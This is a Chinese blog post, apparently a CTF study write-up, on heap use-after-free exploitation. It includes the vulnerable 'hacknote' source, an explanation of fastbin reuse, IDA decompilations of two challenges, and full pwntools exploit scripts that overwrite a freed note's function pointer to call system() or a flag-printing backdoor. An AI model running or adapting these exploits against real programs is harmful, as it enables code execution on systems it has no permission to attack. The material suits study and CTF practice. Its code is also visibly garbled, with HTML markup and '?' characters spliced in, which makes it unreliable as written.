UAF漏洞利用

2023-03-16 13:57 作者:黑社長 0人讀過 | 我要投稿

UAF

原理

內(nèi)存塊被釋放后，其對應(yīng)的指針沒有被設(shè)置為 NULL，然后再次申請我們精心的構(gòu)造的內(nèi)存塊，就能夠達(dá)到攻擊的效果

程序源碼

#include <stdio.h>#include <stdlib.h>#include <unistd.h>struct note { ? ? ? ? ?//結(jié)構(gòu)體 class="k">void (*printnote)(); class="kt">char *content;};struct note *notelist[5]; //結(jié)構(gòu)體變量int count = 0;void print_note_content(struct note *this) { puts(this->content); }void add_note() { class="kt">int i; class="kt">char buf[8]; class="kt">int size; class="k">if (count > 5) { class="n">puts("Full"); class="k">return; class="p">} class="k">for (i = 0; i < 5; i++) { class="k">if (!notelist[i]) { class="n">notelist[i] = (struct note *)malloc(sizeof(struct note)); class="k">if (!notelist[i]) { class="n">puts("Alloca Error"); class="n">exit(-1); class="p">} class="n">notelist[i]->printnote = print_note_content; class="n">printf("Note size :"); class="n">read(0, buf, 8); class="n">size = atoi(buf); class="n">notelist[i]->content = (char *)malloc(size); class="k">if (!notelist[i]->content) { class="n">puts("Alloca Error"); class="n">exit(-1); class="p">} class="n">printf("Content :"); class="n">read(0, notelist[i]->content, size); class="n">puts("Success !"); class="n">count++; class="k">break; class="p">} class="p">}}void del_note() { class="kt">char buf[4]; class="kt">int idx; class="n">printf("Index :"); class="n">read(0, buf, 4); class="n">idx = atoi(buf); class="k">if (idx < 0 || idx >= count) { class="n">puts("Out of bound!"); class="n">_exit(0); class="p">} class="k">if (notelist[idx]) { class="n">free(notelist[idx]->content); class="n">free(notelist[idx]); class="n">puts("Success"); class="p">}}void print_note() { class="kt">char buf[4]; class="kt">int idx; class="n">printf("Index :"); class="n">read(0, buf, 4); class="n">idx = atoi(buf); class="k">if (idx < 0 || idx >= count) { class="n">puts("Out of bound!"); class="n">_exit(0); class="p">} class="k">if (notelist[idx]) { class="n">notelist[idx]->printnote(notelist[idx]); class="p">}}void magic() { system("cat flag"); }void menu() { class="n">puts("----------------------"); class="n">puts(" ? ? ? HackNote ? ? ? "); class="n">puts("----------------------"); class="n">puts(" 1. Add note ? ? ? ? ?"); class="n">puts(" 2. Delete note ? ? ? "); class="n">puts(" 3. Print note ? ? ? ?"); class="n">puts(" 4. Exit ? ? ? ? ? ? ?"); class="n">puts("----------------------"); class="n">printf("Your choice :");};int main() { class="n">setvbuf(stdout, 0, 2, 0); class="n">setvbuf(stdin, 0, 2, 0); class="kt">char buf[4]; class="k">while (1) { class="n">menu(); class="n">read(0, buf, 4); class="k">switch (atoi(buf)) { class="k">case 1: class="n">add_note(); class="k">break; class="k">case 2: class="n">del_note(); class="k">break; class="k">case 3: class="n">print_note(); class="k">break; class="k">case 4: class="n">exit(0); class="k">break; class="k">default: class="n">puts("Invalid choice"); class="k">break; class="p">} class="p">} class="k">return 0;}

利用結(jié)構(gòu)體實現(xiàn)了在chunk的content內(nèi)容下執(zhí)行一個puts函數(shù)
然后再嵌套一個chunk

這里content內(nèi)容存放的一個指針

uaf漏洞

free的是兩個chunk，沒有把兩個指針free掉

存在后門函數(shù)

利用方式

1.申請 note0，real content size（申請的嵌套chunk的大?。?為 32 (0x20)，輸入的content為“aaaa” (0x4)（申請的嵌套chunk大小與 note 大小不同，所在的 bin 不一樣即可）

2.申請 note1，real content size 為 32，輸入的content為“bbbb”（大小與 note 大小所在的 bin 不一樣即可

3.釋放 note0，內(nèi)存會進(jìn)入fastbin中，且content chunk和note chunk會進(jìn)入不同的位置
4.釋放 note1

從這里可以看出fastbins儲存最大的內(nèi)存塊就是0x40大小的chunk
還有就是申請的嵌套chunk的大小要與外層chunk大小不同就是為了free掉后分配到不同的fastbins的鏈表中
然后就是申請的chunk最后有個top chunk(135057)

鏈表的結(jié)構(gòu)

5.申請 note2，并且設(shè)置 real content 的大小為 8，那么根據(jù)堆的分配規(guī)則：
note2 其實會分配 note1 對應(yīng)的內(nèi)存塊。
real content 對應(yīng)的 chunk 其實是 note0。

6.們這時候向 note2 real content 的 chunk 部分寫入 magic 的地址，那么由于我們沒有 note0 為 NULL。當(dāng)我們再次嘗試輸出 note0 的時候，程序就會調(diào)用 magic 函數(shù)。

exp模板

from pwn import *r = process('./hacknote')def addnote(size, content): ? ?r.recvuntil(":") ? ?r.sendline("1") ? ?r.recvuntil(":") ? ?r.sendline(str(size)) ? ?r.recvuntil(":") ? ?r.sendline(content)def delnote(idx): ? ?r.recvuntil(":") ? ?r.sendline("2") ? ?r.recvuntil(":") ? ?r.sendline(str(idx))def printnote(idx): ? ?r.recvuntil(":") ? ?r.sendline("3") ? ?r.recvuntil(":") ? ?r.sendline(str(idx))#gdb.attach(r)magic = 0x08048986addnote(32, "aaaa") # add note 0addnote(32, "bbbb") # add note 1delnote(0) # delete note 0delnote(1) # delete note 1addnote(8, p32(magic)) # add note 2printnote(0) # print note 0r.interactive()

例題

南森招新賽-baozi

checksec

ida

從里面并沒有找到定義的結(jié)構(gòu)體，這也是正?，F(xiàn)象
因為ida不能夠還原所有代碼
這樣的話，在做堆題時，對C語言的要求就不是這么高了，通過調(diào)試或者經(jīng)驗就能得知chunk的結(jié)構(gòu)
但如果想清晰地理解一個堆題還是需要加深對源碼的理解

main

int __cdecl __noreturn main(int argc, const char **argv, const char **envp){ ?int v3; // eax ?char buf[4]; // [esp+0h] [ebp-10h] BYREF ?unsigned int v5; // [esp+4h] [ebp-Ch] ?int *v6; // [esp+8h] [ebp-8h] ?v6 = &argc; ?v5 = __readgsdword(0x14u); ?setvbuf(stdout, 0, 2, 0); ?setvbuf(stdin, 0, 2, 0); ?while ( 1 ) ?{ ? ?menu(); ? ? ? ? ? //菜單 ? ?read(0, buf, 4u); ? ?v3 = atoi(buf); ? ?if ( v3 == 4 ) ? ? ?exit(0); ? ?if ( v3 > 4 ) ? ?{LABEL_12: ? ? ?puts("Invalid choice"); ? ?} ? ?else ? ?{ ? ? ?switch ( v3 ) ? ? ?{ ? ? ? ?case 3: ? ? ? ? ?print_note(); //print chunk ? ? ? ? ?break; ? ? ? ?case 1: ? ? ? ? ?add_note(); ?//malloc chunk ? ? ? ? ?break; ? ? ? ?case 2: ? ? ? ? ?del_note(); ?//free chunk ? ? ? ? ?break; ? ? ? ?default: ? ? ? ? ?goto LABEL_12; ? ? ?} ? ?} ?}}

具體的函數(shù)都是知道的

add(add+edit)

unsigned int add_note(){ ?int v0; // esi ?int i; // [esp+Ch] [ebp-1Ch] ?int size; // [esp+10h] [ebp-18h] ?char buf[8]; // [esp+14h] [ebp-14h] BYREF ?unsigned int v5; // [esp+1Ch] [ebp-Ch] ?v5 = __readgsdword(0x14u); ?if ( count <= 5 ) ?{ ? ?for ( i = 0; i <= 4; ++i ) ? ?//申請次數(shù) ? ?{ ? ? ?if ( !*((_DWORD *)&notelist + i) ) ? ? ?{ ? ? ? ?*((_DWORD *)&notelist + i) = malloc(8u); ? ? ? ? ?//malloc chunk ? ? ? ?if ( !*((_DWORD *)&notelist + i) ) ? ? ? ?{ ? ? ? ? ?puts("Alloca Error"); ? ? ? ? ?exit(-1); ? ? ? ?} ? ? ? ?**((_DWORD **)&notelist + i) = print_note_content; //chunk中content處的內(nèi)容(free后fd指針的地址) 這里是 ? ? ? ?printf("Note size :"); ? ? ? ?read(0, buf, 8u); ? ? ? ?size = atoi(buf); ? ? ? ?v0 = *((_DWORD *)&notelist + i); ? ? ? ?*(_DWORD *)(v0 + 4) = malloc(size); ? ? ? ?//等同于*(*&notelist + i + 4 )=malloc(size) ? ? ? ?//在content的第二單位內(nèi)存的指針中申請chunk(相當(dāng)于在free后的bk指針的地址處申請chunk) ? ? ? ? ?if ( !*(_DWORD *)(*((_DWORD *)&notelist + i) + 4) ) ? ? ? ?{ ? ? ? ? ?puts("Alloca Error"); ? ? ? ? ?exit(-1); ? ? ? ?} ? ? ? ?printf("Content :"); ? ? ? ?read(0, *(void **)(*((_DWORD *)&notelist + i) + 4), size); ? ? ? ?puts("Success !"); ? ? ? ?++count; ? ? ? ?return __readgsdword(0x14u) ^ v5; ? ? ?} ? ?} ?} ?else ?{ ? ?puts("Full"); ?} ?return __readgsdword(0x14u) ^ v5;}

delete

unsigned int del_note(){ ?int v1; // [esp+4h] [ebp-14h] ?char buf[4]; // [esp+8h] [ebp-10h] BYREF ?unsigned int v3; // [esp+Ch] [ebp-Ch] ?v3 = __readgsdword(0x14u); ?printf("Index :"); ?read(0, buf, 4u); ?v1 = atoi(buf); ?if ( v1 < 0 || v1 >= count ) ?{ ? ?puts("Out of bound!"); ? ?_exit(0); ?} ?if ( *(&notelist + v1) ) ?{ ? ?free(*(*(&notelist + v1) + 4)); ? ?//free掉鑲嵌的chunk ? ?free(*(&notelist + v1)); ? ?//free掉chunk ? ?//沒有free掉指針，所以存在uaf ? ?puts("Success"); ?} ?return __readgsdword(0x14u) ^ v3;}

print

unsigned int print_note(){ ?int v1; // [esp+4h] [ebp-14h] ?char buf[4]; // [esp+8h] [ebp-10h] BYREF ?unsigned int v3; // [esp+Ch] [ebp-Ch] ?v3 = __readgsdword(0x14u); ?printf("Index :"); ?read(0, buf, 4u); ?v1 = atoi(buf); ?if ( v1 < 0 || v1 >= count ) ?{ ? ?puts("Out of bound!"); ? ?_exit(0); ?} ?if ( *(&notelist + v1) ) ? ?(**(&notelist + v1))(*(&notelist + v1)); ? ?//print_note_content()函數(shù)=puts(*(*(&notelist + v1) + 4))-->這里相當(dāng)于fd位置為print_note_content函數(shù)，bk指針處為參數(shù) ? ?//從add里面可以找出來 ? ?//**(&notelist + i) = print_note_content; ? ?/*int __cdecl print_note_content(int a1){ ?return puts(*(a1 + 4));}*/ ?return __readgsdword(0x14u) ^ v3;}

print_note_content

int __cdecl print_note_content(int a1){ ?return puts(*(a1 + 4));}

exp

from pwn import *#p=remote("47.99.93.110",10001)p=process('./pwn')elf=ELF('./pwn')context.log_level="debug"def duan(): ? ?gdb.attach(p) ? ?pause(0)def add(size,content): ? ?p.recvuntil("Your choice :") ? ?p.sendline("1") ? ?p.recvuntil("Note size :") ? ?p.sendline(str(size)) ? ?p.recvuntil("Content :") ? ?p.sendline(content)def delete(index): ? ?p.recvuntil("Your choice :") ? ?p.sendline("2") ? ?p.recvuntil("Index :") ? ?p.sendline(str(index))def show(index): ? ?p.recvuntil("Your choice :") ? ?p.sendline("3") ? ?p.recvuntil("Index :") ? ?p.sendline(str(index))bin_sh=0x602010system=0x8049684print(hex(system))add(0x20,"aaaa")#0add(0x20,"bbbb")#1#duan()delete(1)delete(0)duan()add(0x8,p32(system) + p32(system)) #duan()show(1)p.interactive()

ACTF_2019_babyheap

ida

void __fastcall __noreturn main(__int64 a1, char **a2, char **a3){ ?int v3; // eax ?char buf[24]; // [rsp+10h] [rbp-20h] BYREF ?unsigned __int64 v5; // [rsp+28h] [rbp-8h] ?v5 = __readfsqword(0x28u); ?sub_400907(a1, a2, a3); ?while ( 1 ) ?{ ? ?while ( 1 ) ? ?{ ? ? ?sub_4009D2(); ? ? ?read(0, buf, 8uLL); ? ? ?v3 = atoi(buf); ? ? ?if ( v3 != 2 ) ? ? ? ?break; ? ? ?sub_400BAE(); ? ?} ? ?if ( v3 == 3 ) ? ?{ ? ? ?sub_400C66(); ? ?} ? ?else ? ?{ ? ? ?if ( v3 != 1 ) ? ? ? ?sub_400D18(); ? ? ?sub_400A78(); ? ?} ?}}

修改后的ida

main

void __fastcall __noreturn main(__int64 a1, char **a2, char **a3){ ?int v3; // eax ?char buf[24]; // [rsp+10h] [rbp-20h] BYREF ?unsigned __int64 v5; // [rsp+28h] [rbp-8h] ?v5 = __readfsqword(0x28u); ?sub_400907(a1, a2, a3); ?while ( 1 ) ?{ ? ?while ( 1 ) ? ?{ ? ? ?menu(); ? ? ?read(0, buf, 8uLL); ? ? ?v3 = atoi(buf); ? ? ?if ( v3 != 2 ) ? ? ? ?break; ? ? ?delete(); ? ?} ? ?if ( v3 == 3 ) ? ?{ ? ? ?show(); ? ?} ? ?else ? ?{ ? ? ?if ( v3 != 1 ) ? ? ? ?exit_0(); ? ? ?add(); ? ?} ?}}

show

unsigned __int64 sub_400C66(){ ?int v1; // [rsp+Ch] [rbp-24h] ?char buf[24]; // [rsp+10h] [rbp-20h] BYREF ?unsigned __int64 v3; // [rsp+28h] [rbp-8h] ?v3 = __readfsqword(0x28u); ?puts("Please input list index: "); ?read(0, buf, 4uLL); ?v1 = atoi(buf); ?if ( v1 >= 0 && v1 < dword_60204C ) ?{ ? ?if ( *(&ptr + v1) ) ? ? ?(*(*(&ptr + v1) + 1))(**(&ptr + v1)); ? ? ?//這里是執(zhí)行函數(shù)，不過參數(shù)在函數(shù)體的前面 ? ? ?//也就是fd指針處為參數(shù)，bk指針處為函數(shù)體 ?} ?else ?{ ? ?puts("Out of bound!"); ?} ?return __readfsqword(0x28u) ^ v3;}

exp

from pwn import *io=process('./pwn')elf=ELF('./pwn')context(os='linux',arch='amd64',log_level='debug')def duan(): ? ?gdb.attach(io) ? ?pause(0)def add(size,content): ? ?io.recvuntil('Your choice: ') ? ?io.sendline(b'1') ? ?io.recvuntil(b'Please input size: \n') ? ?io.sendline(str(size)) ? ?io.recvuntil('Please input content: \n') ? ?#io.sendline(content) ? ? ?io.send(content)def delete(index): ? ?io.recvuntil('Your choice: ') ? ? ? ?io.sendline(b'2') ? ?io.recvuntil('Please input list index: \n') ? ?io.sendline(str(index))def show(index): ? ? ? ?io.recvuntil('Your choice: ') ? ? ? ?io.sendline(b'3') ? ?io.recvuntil('Please input list index: \n') ? ?io.sendline(str(index))system=elf.plt['system']#system=0x400A48bin_sh=0x602010add(0x20,"aaaa")#0add(0x20,"bbbb")#1#add(0x20,"cccc")delete(1)delete(0)add(0x10,p64(bin_sh)+p64(system))#add(0x10,p64(system)+p64(bin_sh))show(1)io.interactive()

標(biāo)簽：